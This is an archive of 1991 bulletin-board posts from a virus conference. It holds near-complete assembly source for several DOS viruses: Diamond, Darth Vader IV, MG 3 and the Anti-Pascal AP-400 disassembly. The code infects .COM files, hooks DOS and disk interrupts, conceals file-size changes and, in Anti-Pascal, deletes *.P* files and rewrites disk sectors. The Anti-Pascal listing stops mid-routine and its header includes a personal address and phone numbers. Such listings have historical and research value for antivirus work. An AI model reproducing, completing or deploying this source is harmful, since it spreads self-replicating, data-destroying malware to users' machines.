xlatbl dw
|
|||
|
|
|||
|
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
|
|||
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (20:00) Number: 3554
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: DIAMOND <CONT> Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
-324,316,-164,156,-322,318,-162,158,-318,322,-158,162
|
|||
|
dw -316,324,-156,164
|
|||
|
.radix 16
|
|||
|
time_handler:
|
|||
|
push ds
|
|||
|
push es
|
|||
|
push ax
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push si
|
|||
|
push di
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
cld
|
|||
|
mov dx,3da
|
|||
|
mov cx,19
|
|||
|
mov si,offset count
|
|||
|
mov ax,[si]
|
|||
|
test ah,ah
|
|||
|
jnz make_move
|
|||
|
mov al,ah
|
|||
|
mov es,ax
|
|||
|
cmp al,es:[46dh]
|
|||
|
jnz exit_timer
|
|||
|
mov ah,0f
|
|||
|
int 10
|
|||
|
cmp al,2
|
|||
|
jz init_diamond
|
|||
|
cmp al,3
|
|||
|
jnz exit_timer
|
|||
|
init_diamond:
|
|||
|
inc byte ptr [si+1]
|
|||
|
sub bl,bl
|
|||
|
add bh,0b8
|
|||
|
mov [si+2],bx
|
|||
|
mov es,bx
|
|||
|
wait_snow:
|
|||
|
in al,dx
|
|||
|
test al,8
|
|||
|
jz wait_snow
|
|||
|
mov si,offset valtbl
|
|||
|
build_diamond:
|
|||
|
mov di,[si+adrtbl-valtbl]
|
|||
|
movsw
|
|||
|
loop build_diamond
|
|||
|
exit_timer:
|
|||
|
pop di
|
|||
|
pop si
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
pop es
|
|||
|
pop ds
|
|||
|
jmp cs:[old_timer]
|
|||
|
count_down:
|
|||
|
dec byte ptr [si]
|
|||
|
jmp exit_timer
|
|||
|
make_move:
|
|||
|
test al,al
|
|||
|
jnz count_down
|
|||
|
inc byte ptr [si]
|
|||
|
mov si,offset adrtbl
|
|||
|
make_step:
|
|||
|
push cx
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
lodsw
|
|||
|
mov bx,ax
|
|||
|
sub ax,140
|
|||
|
cmp ax,0d20
|
|||
|
jc no_xlat
|
|||
|
test ax,ax
|
|||
|
mov ax,[si+diftbl-adrtbl-2]
|
|||
|
jns test_xlat
|
|||
|
test ax,ax
|
|||
|
js do_xlat
|
|||
|
jmp short no_xlat
|
|||
|
test_xlat:
|
|||
|
test ax,ax
|
|||
|
js no_xlat
|
|||
|
do_xlat:
|
|||
|
mov di,offset xlatbl
|
|||
|
mov cx,10
|
|||
|
repnz scasw
|
|||
|
dec di
|
|||
|
dec di
|
|||
|
xor di,2
|
|||
|
mov ax,[di]
|
|||
|
mov [si+diftbl-adrtbl-2],ax
|
|||
|
no_xlat:
|
|||
|
mov ax,[si-2]
|
|||
|
add ax,[si+diftbl-adrtbl-2]
|
|||
|
mov [si-2],ax
|
|||
|
mov cx,19
|
|||
|
mov di,offset adrtbl
|
|||
|
|
|||
|
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
|
|||
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (20:00) Number: 3555
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: DIAMOND <CONT> Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
lookup:
|
|||
|
jcxz looked_up
|
|||
|
repnz scasw
|
|||
|
jnz looked_up
|
|||
|
cmp si,di
|
|||
|
jz lookup
|
|||
|
mov [si-2],bx
|
|||
|
mov ax,[si+diftbl-adrtbl-2]
|
|||
|
xchg ax,[di+diftbl-adrtbl-2]
|
|||
|
mov [si+diftbl-adrtbl-2],ax
|
|||
|
jmp lookup
|
|||
|
looked_up:
|
|||
|
mov es,[homeadr]
|
|||
|
mov di,bx
|
|||
|
xor bx,bx
|
|||
|
call out_char
|
|||
|
mov di,[si-2]
|
|||
|
mov bx,[si+valtbl-adrtbl-2]
|
|||
|
call out_char
|
|||
|
pop cx
|
|||
|
loop make_step
|
|||
|
jmp exit_timer
|
|||
|
out_char:
|
|||
|
in al,dx
|
|||
|
test al,1
|
|||
|
jnz out_char
|
|||
|
check_snow:
|
|||
|
in al,dx
|
|||
|
test al,1
|
|||
|
jz check_snow
|
|||
|
xchg ax,bx
|
|||
|
stosw
|
|||
|
ret
|
|||
|
stack_offset dd ?
|
|||
|
return_address dd ?
|
|||
|
db '7106286813'
|
|||
|
exe_header: int 20
|
|||
|
last_page: nop
|
|||
|
top_code:
|
|||
|
db ?
|
|||
|
page_count dw ?
|
|||
|
dw ?
|
|||
|
header_size dw ?
|
|||
|
min_size dw ?
|
|||
|
max_size dw ?
|
|||
|
ss_offset dw ?
|
|||
|
sp_offset dw ?
|
|||
|
dw ?
|
|||
|
ip_offset dw ?
|
|||
|
cs_offset dw ?
|
|||
|
top_header:
|
|||
|
file_size dd ?
|
|||
|
old_vector dd ?
|
|||
|
old_timer dd ?
|
|||
|
count db ?
|
|||
|
flag db ?
|
|||
|
homeadr dw ?
|
|||
|
top_data:
|
|||
|
end
|
|||
|
|
|||
|
---
|
|||
|
<EFBFBD> RonMail 1.0 <EFBFBD> Programmer's Inn - Home of FeatherNet (619)-446-4506
|
|||
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (20:06) Number: 3556
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: DARTH VADER Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
;*********************************************************************
|
|||
|
**********
|
|||
|
;*
|
|||
|
*
|
|||
|
;* D A R T H V A D E R IV
|
|||
|
*
|
|||
|
;*
|
|||
|
*
|
|||
|
;* (C) - Copyright 1991 by Waleri Todorov, CICTT-Sofia
|
|||
|
*
|
|||
|
;* All Rights Reserved
|
|||
|
*
|
|||
|
;*
|
|||
|
&
|
|||
|
;* Enchanced by: Lazy Wizard
|
|||
|
&
|
|||
|
;*
|
|||
|
&
|
|||
|
;* Turbo Assembler 2.0
|
|||
|
&
|
|||
|
;*
|
|||
|
&
|
|||
|
;*********************************************************************
|
|||
|
**********
|
|||
|
|
|||
|
|
|||
|
.model tiny
|
|||
|
.code
|
|||
|
|
|||
|
org 100h
|
|||
|
|
|||
|
Start:
|
|||
|
call NextLine
|
|||
|
First3:
|
|||
|
int 20h
|
|||
|
int 3
|
|||
|
NextLine:
|
|||
|
pop bx
|
|||
|
push ax
|
|||
|
xor di,di
|
|||
|
mov es,di
|
|||
|
mov es,es:[2Bh*4+2]
|
|||
|
mov cx,1000h
|
|||
|
call SearchZero
|
|||
|
jc ReturnControl
|
|||
|
xchg ax,si
|
|||
|
inc si
|
|||
|
SearchTable:
|
|||
|
dec si
|
|||
|
db 26h
|
|||
|
lodsw
|
|||
|
cmp ax,8B2Eh
|
|||
|
jne SearchTable
|
|||
|
db 26h
|
|||
|
lodsb
|
|||
|
cmp al,75h
|
|||
|
je ReturnControl
|
|||
|
cmp al,9Fh
|
|||
|
jne SearchTable
|
|||
|
mov si,es:[si]
|
|||
|
mov cx,LastByte-Start
|
|||
|
lea ax,[di+Handle-Start]
|
|||
|
org $-1
|
|||
|
xchg ax,es:[si+80h]
|
|||
|
sub ax,di
|
|||
|
sub ax,cx
|
|||
|
mov [bx+OldWrite-Start-2],ax
|
|||
|
mov word ptr [bx+NewStart+1-Start-3],di
|
|||
|
lea si,[bx-3]
|
|||
|
rep movsb
|
|||
|
ReturnControl:
|
|||
|
pop ax
|
|||
|
push ss
|
|||
|
pop es
|
|||
|
mov di,100h
|
|||
|
lea si,[bx+First3-Start-3]
|
|||
|
push di
|
|||
|
movsw
|
|||
|
movsb
|
|||
|
ret
|
|||
|
SearchZero:
|
|||
|
xor ax,ax
|
|||
|
inc di
|
|||
|
push cx
|
|||
|
push di
|
|||
|
mov cx,(LastByte-Start-1)/2+1
|
|||
|
repe scasw
|
|||
|
pop di
|
|||
|
pop cx
|
|||
|
je FoundPlace
|
|||
|
loop SearchZero
|
|||
|
stc
|
|||
|
FoundPlace:
|
|||
|
ret
|
|||
|
Handle:
|
|||
|
push bp
|
|||
|
call NextHandle
|
|||
|
NextHandle:
|
|||
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (20:06) Number: 3557
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: DARTH VADER <CONT> Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
pop bp
|
|||
|
push es
|
|||
|
push ax
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
push si
|
|||
|
push di
|
|||
|
test ch,ch
|
|||
|
je Do
|
|||
|
mov ax,1220h
|
|||
|
int 2Fh
|
|||
|
mov bl,es:[di]
|
|||
|
mov ax,1216h
|
|||
|
int 2Fh
|
|||
|
cmp es:[di+29h],'MO'
|
|||
|
jne Do
|
|||
|
cmp word ptr es:[di+15h],0
|
|||
|
jne Do
|
|||
|
push ds
|
|||
|
pop es
|
|||
|
mov di,dx
|
|||
|
mov ax,[di]
|
|||
|
mov [bp+First3-NextHandle],ax
|
|||
|
mov al,[di+2]
|
|||
|
mov [bp+First3+2-NextHandle],al
|
|||
|
call SearchZero
|
|||
|
jc Do
|
|||
|
push di
|
|||
|
NewStart:
|
|||
|
mov si,0
|
|||
|
mov cx,(LastByte-Start-1)/2
|
|||
|
cli
|
|||
|
rep
|
|||
|
db 36h
|
|||
|
movsw
|
|||
|
sti
|
|||
|
mov di,dx
|
|||
|
mov al,0E9h
|
|||
|
stosb
|
|||
|
pop ax
|
|||
|
sub ax,di
|
|||
|
dec ax
|
|||
|
dec ax
|
|||
|
stosw
|
|||
|
Do:
|
|||
|
pop di
|
|||
|
pop si
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
pop es
|
|||
|
pop bp
|
|||
|
OldWrite:
|
|||
|
jmp start
|
|||
|
|
|||
|
LastByte label byte
|
|||
|
|
|||
|
end Start
|
|||
|
|
|||
|
---
|
|||
|
<EFBFBD> RonMail 1.0 <EFBFBD> Programmer's Inn - Home of FeatherNet (619)-446-4506
|
|||
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (20:07) Number: 3558
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: MG 3 Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
; (C) Copyright VirusSoft Corp. Sep., 1990
|
|||
|
;
|
|||
|
; This is the SOURCE file of last version of MASTER,(V500),(MG) ect.
|
|||
|
; virus, distributed by VirusSoft company . First version was made
|
|||
|
; in May., 1990 . Please don't make any corections in this file !
|
|||
|
;
|
|||
|
; Bulgaria, Varna
|
|||
|
; Sep. 27, 1990
|
|||
|
|
|||
|
|
|||
|
|
|||
|
ofs = 201h
|
|||
|
len = offset end-ofs
|
|||
|
|
|||
|
call $+6
|
|||
|
|
|||
|
org ofs
|
|||
|
|
|||
|
first: dw 020cdh
|
|||
|
db 0
|
|||
|
|
|||
|
pop di
|
|||
|
dec di
|
|||
|
dec di
|
|||
|
mov si,[di]
|
|||
|
dec di
|
|||
|
add si,di
|
|||
|
push cs
|
|||
|
push di
|
|||
|
cld
|
|||
|
movsw
|
|||
|
movsb
|
|||
|
xchg ax,dx
|
|||
|
|
|||
|
mov ax,4b04h
|
|||
|
int 21h
|
|||
|
jnc residnt
|
|||
|
|
|||
|
xor ax,ax
|
|||
|
mov es,ax
|
|||
|
mov di,ofs+3
|
|||
|
mov cx,len-3
|
|||
|
rep movsb
|
|||
|
|
|||
|
les di,[6]
|
|||
|
mov al,0eah
|
|||
|
dec cx
|
|||
|
repne scasb
|
|||
|
les di,es:[di] ; Searching for the INT21 vector
|
|||
|
sub di,-1ah-7
|
|||
|
|
|||
|
db 0eah
|
|||
|
dw offset jump,0 ; jmp far 0000:jump
|
|||
|
|
|||
|
jump: push es
|
|||
|
pop ds
|
|||
|
mov si,[di+3-7] ;
|
|||
|
lodsb ;
|
|||
|
cmp al,68h ; compare DOS Ver
|
|||
|
mov [di+4-7],al ; Change CMP AH,CS:[????]
|
|||
|
mov [di+2-7],0fc80h ;
|
|||
|
mov [di-7],0fccdh ;
|
|||
|
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
|
|||
|
mov [1020],di ; int 0ffh
|
|||
|
mov [1022],es
|
|||
|
|
|||
|
mov beg-1,byte ptr not3_3-beg
|
|||
|
jb not3.3 ; CY = 0 --> DOS Ver > or = 3.30
|
|||
|
mov beg-1,byte ptr 0
|
|||
|
mov [7b4h],offset pr7b4
|
|||
|
mov [7b6h],cs ; 7b4
|
|||
|
|
|||
|
not3.3: mov al,0a9h ; Change attrib
|
|||
|
cont: repne scasb
|
|||
|
cmp es:[di],0ffd8h
|
|||
|
jne cont
|
|||
|
mov al,18h
|
|||
|
stosb
|
|||
|
|
|||
|
push ss
|
|||
|
pop ds
|
|||
|
|
|||
|
push ss
|
|||
|
pop es
|
|||
|
|
|||
|
residnt: xchg ax,dx
|
|||
|
retf ; ret far
|
|||
|
|
|||
|
;--------Interrupt process--------;
|
|||
|
|
|||
|
i21pr: push ax
|
|||
|
push dx
|
|||
|
push ds
|
|||
|
push cx
|
|||
|
push bx
|
|||
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (20:07) Number: 3559
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: MG 3 <CONT> Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
push es
|
|||
|
|
|||
|
if4b04: cmp ax,4b04h
|
|||
|
je rti
|
|||
|
|
|||
|
xchg ax,cx
|
|||
|
mov ah,02fh
|
|||
|
int 0ffh
|
|||
|
|
|||
|
if11_12: cmp ch,11h
|
|||
|
je yes
|
|||
|
cmp ch,12h
|
|||
|
jne inffn
|
|||
|
yes: xchg ax,cx
|
|||
|
int 0ffh
|
|||
|
push ax
|
|||
|
test es:byte ptr [bx+19],0c0h
|
|||
|
jz normal
|
|||
|
sub es:[bx+36],len
|
|||
|
normal: pop ax
|
|||
|
rti: pop es
|
|||
|
pop bx
|
|||
|
pop cx
|
|||
|
add sp,12
|
|||
|
iret
|
|||
|
|
|||
|
inffn: mov ah,19h
|
|||
|
int 0ffh
|
|||
|
push ax
|
|||
|
|
|||
|
if36: cmp ch,36h ; -free bytes
|
|||
|
je beg_36
|
|||
|
if4e: cmp ch,4eh ; -find first FM
|
|||
|
je beg_4b
|
|||
|
if4b: cmp ch,4bh ; -exec
|
|||
|
je beg_4b
|
|||
|
if47: cmp ch,47h ; -directory info
|
|||
|
jne if5b
|
|||
|
cmp al,2
|
|||
|
jae begin ; it's hard-disk
|
|||
|
if5b: cmp ch,5bh ; -create new
|
|||
|
je beg_4b
|
|||
|
if3c_3d: shr ch,1 ; > -open & create
|
|||
|
cmp ch,1eh ; -
|
|||
|
je beg_4b
|
|||
|
|
|||
|
jmp rest
|
|||
|
|
|||
|
beg_4b: mov ax,121ah
|
|||
|
xchg dx,si
|
|||
|
int 2fh
|
|||
|
xchg ax,dx
|
|||
|
xchg ax,si
|
|||
|
|
|||
|
beg_36: mov ah,0eh ; change current drive
|
|||
|
dec dx ;
|
|||
|
int 0ffh ;
|
|||
|
|
|||
|
begin:
|
|||
|
push es ; save DTA address
|
|||
|
push bx ;
|
|||
|
sub sp,44
|
|||
|
mov dx,sp ; change DTA
|
|||
|
push sp
|
|||
|
mov ah,1ah
|
|||
|
push ss
|
|||
|
pop ds
|
|||
|
int 0ffh
|
|||
|
mov bx,dx
|
|||
|
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
|
|||
|
mov ah,04eh
|
|||
|
mov dx,offset file
|
|||
|
mov cx,3 ; r/o , hidden
|
|||
|
int 0ffh ; int 21h
|
|||
|
jc lst
|
|||
|
|
|||
|
next: test ss:[bx+21],byte ptr 80h
|
|||
|
jz true
|
|||
|
nxt: mov ah,4fh ; find next
|
|||
|
int 0ffh
|
|||
|
jnc next
|
|||
|
lst: jmp last
|
|||
|
|
|||
|
true: cmp ss:[bx+27],byte ptr 0fdh
|
|||
|
ja nxt
|
|||
|
mov [144],offset i24pr
|
|||
|
mov [146],cs
|
|||
|
|
|||
|
les ax,[4ch] ; int 13h
|
|||
|
mov i13adr,ax
|
|||
|
mov i13adr+2,es
|
|||
|
jmp short $
|
|||
|
beg: mov [4ch],offset i13pr
|
|||
|
mov [4eh],cs
|
|||
|
|
|||
|
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
|
|||
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (20:07) Number: 3560
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: MG 3 <CONT> Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
;
|
|||
|
not3_3: push ss
|
|||
|
pop ds
|
|||
|
push [bx+22] ; time +
|
|||
|
push [bx+24] ; date +
|
|||
|
push [bx+21] ; attrib +
|
|||
|
lea dx,[bx+30] ; ds : dx = offset file name
|
|||
|
mov ax,4301h ; Change attrib !!!
|
|||
|
pop cx
|
|||
|
and cx,0feh ; clear r/o and CH
|
|||
|
or cl,0c0h ; set Infect. attr
|
|||
|
int 0ffh
|
|||
|
|
|||
|
mov ax,03d02h ; open
|
|||
|
int 0ffh ; int 21h
|
|||
|
xchg ax,bx
|
|||
|
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
|
|||
|
mov ah,03fh
|
|||
|
mov cx,3
|
|||
|
mov dx,offset first
|
|||
|
int 0ffh
|
|||
|
|
|||
|
mov ax,04202h ; move fp to EOF
|
|||
|
xor dx,dx
|
|||
|
mov cx,dx
|
|||
|
int 0ffh
|
|||
|
mov word ptr cal_ofs+1,ax
|
|||
|
|
|||
|
mov ah,040h
|
|||
|
mov cx,len
|
|||
|
mov dx,ofs
|
|||
|
int 0ffh
|
|||
|
jc not_inf
|
|||
|
|
|||
|
mov ax,04200h
|
|||
|
xor dx,dx
|
|||
|
mov cx,dx
|
|||
|
int 0ffh
|
|||
|
|
|||
|
mov ah,040h
|
|||
|
mov cx,3
|
|||
|
mov dx,offset cal_ofs
|
|||
|
int 0ffh
|
|||
|
|
|||
|
not_inf: mov ax,05701h
|
|||
|
pop dx ; date
|
|||
|
pop cx ; time
|
|||
|
int 0ffh
|
|||
|
|
|||
|
mov ah,03eh ; close
|
|||
|
int 0ffh
|
|||
|
|
|||
|
les ax,dword ptr i13adr
|
|||
|
mov [4ch],ax ; int 13h
|
|||
|
mov [4eh],es
|
|||
|
|
|||
|
last: add sp,46
|
|||
|
pop dx
|
|||
|
pop ds ; restore DTA
|
|||
|
mov ah,1ah
|
|||
|
int 0ffh
|
|||
|
|
|||
|
rest: pop dx ; restore current drive
|
|||
|
mov ah,0eh ;
|
|||
|
int 0ffh ;
|
|||
|
|
|||
|
pop es
|
|||
|
pop bx
|
|||
|
pop cx
|
|||
|
pop ds
|
|||
|
pop dx
|
|||
|
pop ax
|
|||
|
|
|||
|
i21cl: iret ; Return from INT FC
|
|||
|
|
|||
|
i24pr: mov al,3 ; Critical errors
|
|||
|
iret
|
|||
|
|
|||
|
i13pr: cmp ah,3
|
|||
|
jne no
|
|||
|
inc byte ptr cs:activ
|
|||
|
dec ah
|
|||
|
no: jmp dword ptr cs:i13adr
|
|||
|
|
|||
|
pr7b4: db 2eh,0d0h,2eh
|
|||
|
dw offset activ
|
|||
|
; shr cs:activ,1
|
|||
|
jnc ex7b0
|
|||
|
inc ah
|
|||
|
ex7b0: jmp dword ptr cs:[7b0h]
|
|||
|
|
|||
|
;--------
|
|||
|
|
|||
|
file: db "*",32,".COM"
|
|||
|
|
|||
|
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
|
|||
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (20:07) Number: 3561
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: MG 3 <CONT> Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
|
|||
|
activ: db 0
|
|||
|
|
|||
|
dw offset i21pr ; int 0fch
|
|||
|
dw 0
|
|||
|
|
|||
|
cal_ofs: db 0e8h
|
|||
|
|
|||
|
end:
|
|||
|
dw ? ; cal_ofs
|
|||
|
|
|||
|
i13adr: dw ?
|
|||
|
dw ?
|
|||
|
|
|||
|
|
|||
|
; The End.---
|
|||
|
|
|||
|
* Origin: ESaSS / Thunderbyte support, The Netherlands (2:280/200)
|
|||
|
|
|||
|
---
|
|||
|
<EFBFBD> RonMail 1.0 <EFBFBD> Programmer's Inn - Home of FeatherNet (619)-446-4506
|
|||
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (20:08) Number: 3562
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: ANTI PASCAL Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
page ,132
|
|||
|
name AP400
|
|||
|
title The 'Anti-Pascal' virus, version AP-400
|
|||
|
.radix 16
|
|||
|
|
|||
|
;
|
|||
|
......................................................................
|
|||
|
......
|
|||
|
; . Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5,
|
|||
|
ap. 51 .
|
|||
|
; . Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255
|
|||
|
.
|
|||
|
; .
|
|||
|
.
|
|||
|
; . The 'Anti-Pascal' Virus, version AP-400
|
|||
|
.
|
|||
|
; . Disassembled by Vesselin Bontchev, July 1990
|
|||
|
.
|
|||
|
; .
|
|||
|
.
|
|||
|
; . Copyright (c) Vesselin Bontchev 1989, 1990
|
|||
|
.
|
|||
|
; .
|
|||
|
.
|
|||
|
; . This listing is only to be made available to virus
|
|||
|
researchers .
|
|||
|
; . or software writers on a need-to-know basis.
|
|||
|
.
|
|||
|
;
|
|||
|
......................................................................
|
|||
|
......
|
|||
|
|
|||
|
; The disassembly has been tested by re-assembly using MASM 5.0.
|
|||
|
|
|||
|
code segment
|
|||
|
assume cs:code, ds:code
|
|||
|
|
|||
|
org 100
|
|||
|
|
|||
|
v_const = 2042d
|
|||
|
|
|||
|
start:
|
|||
|
jmp v_entry
|
|||
|
db 0CA ; Virus signature
|
|||
|
|
|||
|
db (2048d - 9) dup (90) ; The original "program"
|
|||
|
|
|||
|
mov ax,4C00 ; Just exit
|
|||
|
int 21
|
|||
|
|
|||
|
v_start label byte
|
|||
|
first4 db 0E9, 0F8, 7, 90
|
|||
|
allcom db '*.COM', 0
|
|||
|
|
|||
|
mydta label byte
|
|||
|
reserve db 15 dup (?)
|
|||
|
attrib db ?
|
|||
|
time dw ?
|
|||
|
date dw ?
|
|||
|
fsize dd ?
|
|||
|
namez db 14d dup (?)
|
|||
|
|
|||
|
allp db 0, '?????????A?'
|
|||
|
maxdrv db ?
|
|||
|
sign db 'PAD'
|
|||
|
|
|||
|
v_entry:
|
|||
|
push ax ; Save AX & DX
|
|||
|
push dx
|
|||
|
|
|||
|
mov ah,19 ; Get the default drive
|
|||
|
int 21
|
|||
|
push ax ; Save it on stack
|
|||
|
mov ah,0E ; Set it as default (?!)
|
|||
|
mov dl,al
|
|||
|
int 21 ; Do it
|
|||
|
|
|||
|
call self ; Determine the virus' start
|
|||
|
address
|
|||
|
self:
|
|||
|
pop si
|
|||
|
sub si,offset self-v_const
|
|||
|
|
|||
|
; Save the number of logical drives in the system:
|
|||
|
|
|||
|
mov byte ptr [si+offset maxdrv-v_const],al
|
|||
|
|
|||
|
; Restore the first 4 bytes of the infected program:
|
|||
|
|
|||
|
mov ax,[si+offset first4-v_const]
|
|||
|
mov word ptr ds:[offset start],ax
|
|||
|
mov ax,[si+offset first4+2-v_const]
|
|||
|
mov word ptr ds:[offset start+2],ax
|
|||
|
|
|||
|
mov ah,1A ; Set new DTA
|
|||
|
lea dx,[si+offset mydta-v_const]
|
|||
|
int 21 ; Do it
|
|||
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (20:08) Number: 3563
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: ANTI PASCAL <CONT> Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
pop ax ; Restore current drive in AL
|
|||
|
push ax ; Keep it on stack
|
|||
|
|
|||
|
call inf_drive ; Proceed with the current drive
|
|||
|
|
|||
|
xor al,al ; For all logical drives in
|
|||
|
the system
|
|||
|
drv_lp:
|
|||
|
call inf_drive ; Proceed with drive
|
|||
|
jbe drv_lp ; Loop until no more drives
|
|||
|
|
|||
|
pop ax ; Restore the saved current drive
|
|||
|
mov ah,0E ; Set it as current drive
|
|||
|
mov dl,al
|
|||
|
int 21 ; Do it
|
|||
|
|
|||
|
mov dx,80 ; Restore original DTA
|
|||
|
mov ah,1A
|
|||
|
int 21 ; Do it
|
|||
|
|
|||
|
mov si,offset start
|
|||
|
pop dx ; Restore DX & AX
|
|||
|
pop ax
|
|||
|
jmp si ; Run the original program
|
|||
|
|
|||
|
inf_drive:
|
|||
|
push ax ; Save the selected drive number
|
|||
|
on stack
|
|||
|
mov ah,0E ; Select that drive
|
|||
|
mov dl,al
|
|||
|
int 21 ; Do ti
|
|||
|
pop ax ; Restore AX
|
|||
|
|
|||
|
push ax ; Save the registers used
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
push si ; Save SI
|
|||
|
|
|||
|
mov cx,1 ; Read sector #50 of the drive
|
|||
|
specified
|
|||
|
mov dx,50d
|
|||
|
lea bx,[si+offset v_end-v_const]
|
|||
|
push ax ; Save AX
|
|||
|
push bx ; Save BX, CX & DX also
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
int 25 ; Do read
|
|||
|
pop dx ; Clear the stack
|
|||
|
pop dx ; Restore saved DX, CX & BX
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
jnc wr_drive ; Write the information back if no
|
|||
|
error
|
|||
|
|
|||
|
pop ax ; Restore AX
|
|||
|
pop si ; Restore SI
|
|||
|
|
|||
|
drv_xit:
|
|||
|
pop cx ; Restore used registers
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
|
|||
|
inc al ; Go to next drive number
|
|||
|
cmp al,[si+offset maxdrv-v_const] ; See if there
|
|||
|
are more drives
|
|||
|
xit:
|
|||
|
ret ; Exit
|
|||
|
|
|||
|
wr_drive:
|
|||
|
pop ax ; Restore drive number in AL
|
|||
|
int 26 ; Do write
|
|||
|
pop ax ; Clear the stack
|
|||
|
pop si ; Restore Si
|
|||
|
jnc cont ; Continue if no error
|
|||
|
clc
|
|||
|
jmp drv_xit ; Otherwise exit
|
|||
|
|
|||
|
; Find first COM file on the current directory of the selected drive:
|
|||
|
|
|||
|
cont:
|
|||
|
mov ah,4E
|
|||
|
xor cx,cx ; Normal files only
|
|||
|
lea dx,[si+offset allcom-v_const] ; File mask
|
|||
|
next:
|
|||
|
int 21 ; Do find
|
|||
|
jc no_more ; Quit search if no more such files
|
|||
|
lea dx,[si+offset namez-v_const] ; Get file name
|
|||
|
found
|
|||
|
call infect ; Infect that file
|
|||
|
mov ah,4F ; Prepare for FindNext
|
|||
|
jc next ; If infection not successful,
|
|||
|
go to next file
|
|||
|
jmp drv_xit ; Otherwise quit
|
|||
|
|
|||
|
no_more:
|
|||
|
mov ah,13 ; Delete all *.P* files in
|
|||
|
that dir
|
|||
|
|
|||
|
<ORIGINAL MESSAGE OVER 100 LINES, SPLIT IN 2 OR MORE>
|
|||
|
===========================================================================
|
|||
|
BBS: The Programmer's Inn
|
|||
|
Date: 11-24-91 (20:08) Number: 3564
|
|||
|
From: AHMED DOGAN Refer#: NONE
|
|||
|
To: ALL Recvd: NO
|
|||
|
Subj: ANTI PASCAL <CONT> Conf: (16) VIRUS
|
|||
|
---------------------------------------------------------------------------
|
|||
|
lea dx,[si+offset allp-v_const]
|
|||
|
int 21 ; Do it
|
|||
|
clc
|
|||
|
jmp drv_xit ; Done. Exit
|
|||
|
|
|||
|
namaddr dw ? ; Address of the file name buffer
|
|||
|
|
|||
|
infect:
|
|||
|
mov [si+offset namaddr-v_const],dx ; Save file
|
|||
|
name address
|
|||
|
|
|||
|
mov ax,4301 ; Reset all file attributes
|
|||
|
xor cx,cx
|
|||
|
int 21 ; Do it
|
|||
|
jc xit ; Exit on error
|
|||
|
|
|||
|
mov ax,3D02 ; Open file for both reading and
|
|||
|
writing
|
|||
|
int 21
|
|||
|
jc xit ; Exit on arror
|
|||
|
mov bx,ax ; Save file handle in BX
|
|||
|
|
|||
|
mov cx,4 ; Read the first 4 bytes of the
|
|||
|
file
|
|||
|
mov ah,3F
|
|||
|
lea di,[si+offset first4-v_const] ; Save them in
|
|||
|
first4
|
|||
|
mov dx,di
|
|||
|
int 21 ; Do it
|
|||
|
jc quit ; Exit on error
|
